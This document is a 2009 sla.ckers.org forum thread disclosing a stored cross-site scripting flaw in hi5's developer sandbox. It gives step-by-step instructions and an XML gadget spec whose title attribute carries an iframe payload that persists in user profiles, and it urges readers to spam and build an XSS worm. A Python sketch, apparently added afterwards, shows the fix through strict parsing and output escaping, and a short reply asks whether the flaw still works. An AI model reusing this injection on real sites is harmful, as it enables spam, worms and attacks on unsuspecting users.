Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
0day script injection in hi5 developer tools (permanent xss in users profiles)
Posted by: nemessis
Date: December 29, 2009 07:17PM

NOTE: it works only with logged-in hi5 users

1. Create an account.
2. Upload a pic (not necessarily).
3. Go to [betasandbox.hi5.com] and press sign up


4. Check one or all languages
5. Type - personal / Purpose - blablabla



Now you are redirected to [betasandbox.hi5.com]

6. Click "Create your first App"



7. Click "Create Sample App"



8. Click "Sample App"



9. You will receive an error with page not found. Copy the user id from your browser address bar. That link looks like:
http://betasandbox.hi5.com/friend/apps/entry/www.betasandbox.hi5.com/friend/apps/developer/app/get/xml/43772?view=devCanvas&from=devhome&

In this case user id is 43772.

10. Now put your user id in this link (replace the word USERIDHERE with your user id):
http://hi5.com/friend/apps/developer/app/refresh.do?appId=USERIDHERE#/friend/apps/ajax/displayEditApp.do?appId=USERIDHERE

11. Click "Back to Dev Canvas View". When you see this image press edit and after that press save.



12. Click Add to my profile button



13. Now change the text

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Sample App" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>

with this one.

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="<iframe src=http://site.com>" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>


Now join some groups, spam, add friends and profit. Or maybe sirdarckcat will have fun with another xss worm in Hi5 :)

http://www.rstcenter.com - Romanian Security Team
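A defensive sketch of the rendering side of the issue in the post above, added here as an example and not taken from the thread or from hi5's code: the app spec is parsed strictly, and the `ModulePrefs` title is HTML-escaped when it is written into the profile page. The function names, the `app-title` markup and the placeholder e-mail address are assumptions.

```python
import html
import xml.etree.ElementTree as ET

# Constructed gadget specs modelled on the post; the e-mail address is a placeholder.
SPEC_AS_POSTED = b'''<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="<iframe src=http://site.com>" author_email="dev@example.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>'''

# Same title value written as well-formed XML, used to exercise the output path.
SPEC_WELL_FORMED = SPEC_AS_POSTED.replace(
    b'"<iframe src=http://site.com>"', b'"&lt;iframe src=http://site.com&gt;"')


def load_title(spec_bytes):
    """Return the ModulePrefs title, or None when the spec is rejected."""
    try:
        # Stdlib parser for the demo; defusedxml is the safer choice for untrusted XML.
        root = ET.fromstring(spec_bytes)
    except ET.ParseError:
        return None  # a raw '<' inside an attribute value is not well-formed XML
    prefs = root.find("ModulePrefs")
    return None if prefs is None else prefs.get("title", "")


def render_app_header(spec_bytes):
    """Build the profile-page fragment (hypothetical markup) for an app title."""
    title = load_title(spec_bytes)
    if title is None:
        return '<div class="app-title">[invalid app spec]</div>'
    # The parser decodes entities, so the value is HTML-escaped at output time.
    return '<div class="app-title">%s</div>' % html.escape(title, quote=True)


if __name__ == "__main__":
    for name, spec in (("as posted", SPEC_AS_POSTED), ("well-formed", SPEC_WELL_FORMED)):
        print(name, "->", render_app_header(spec))
```

Strict parsing and output escaping are separate controls here: the first rejects a spec that is not valid XML, the second keeps any accepted title inert in the page.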
Re: 0day script injection in hi5 developer tools (permanent xss in users profiles)
Posted by: d4rw1n
Date: February 24, 2010 09:08AM

Is this still valid?
